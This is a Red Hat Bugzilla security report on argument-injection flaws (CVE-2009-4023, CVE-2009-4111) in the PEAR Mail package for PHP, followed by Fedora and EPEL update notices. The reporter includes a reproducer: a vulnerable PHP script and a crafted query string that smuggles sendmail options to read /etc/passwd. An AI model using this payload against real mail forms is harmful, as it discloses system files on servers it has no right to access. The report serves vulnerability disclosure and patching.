Bug 540842 (CVE-2009-4023, CVE-2009-4111)
Summary: | CVE-2009-4023 CVE-2009-4111 php-pear-Mail: Absent sanitization of mail header fields | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
Status: | CLOSED ERRATA | QA Contact: | |
Severity: | high | Docs Contact: | |
Priority: | high | ||
Version: | unspecified | CC: | fedora, mjc |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
URL: | http://pear.php.net/bugs/bug.php?id=16200 | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Bug Fix | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2010-12-21 22:04:57 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 541964 | ||
Bug Blocks: |
Description
Jan Lieskovsky
2009-11-24 10:37:59 UTC
Reproducer: ----------- <?php ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:'); require_once("Mail.php"); $from = "From: " . $_REQUEST['email'] . "\r\n"; $to = "xxxxxxx"; $subj = "subscription request"; $body = "subscribe me"; $hdrs = array( "To" => $to, "Cc" => $cc, "Bcc" => $bcc, "From" => $from, "Subject" => $subject, ); $body="test"; $mail =& Mail::factory('sendmail'); $mail->send($to, $hdrs, $body); ?> test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3 Note: You might need to change the patch to ':/usr/share/pear/:'. After this I can view the content of my /etc/passwd with some add-ons as /tmp/wokao. This issue affects the versions of the php-pear-Mail package, as shipped with Fedora release of 10, 11, 12 and as shipped with Extra Packages for Enteprise Linux 5 (EPEL-5) project. Please fix. This is CVE-2009-4023. php-pear-Mail-1.1.14-5.el5.1 has been submitted as an update for Fedora EPEL 5. http://admin.fedoraproject.org/updates/php-pear-Mail-1.1.14-5.el5.1 Common Vulnerabilities and Exposures assigned a separate identifier of CVE-2009-4111 for the missing sanitization of the $recipients header of php-pear-Mail: Argument injection vulnerability in Mail/sendmail.php in the Mail package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows remote attackers to read and write arbitrary files via a crafted $recipients parameter, and possibly other parameters, a different vulnerability than CVE-2009-4023. References: ----------- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111 http://www.openwall.com/lists/oss-security/2009/11/23/8 http://www.openwall.com/lists/oss-security/2009/11/28/2 http://pear.php.net/bugs/bug.php?id=16200 https://bugs.gentoo.org/show_bug.cgi?id=294256 php-pear-Mail-1.1.14-5.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report. php-pear-Mail-1.1.14-5.fc12 has been pushed to the Fedora 12 stable repository. If problems still persist, please make note of it in this bug report. php-pear-Mail-1.1.14-5.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report. php-pear-Mail-1.1.14-5.el5.1 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report. |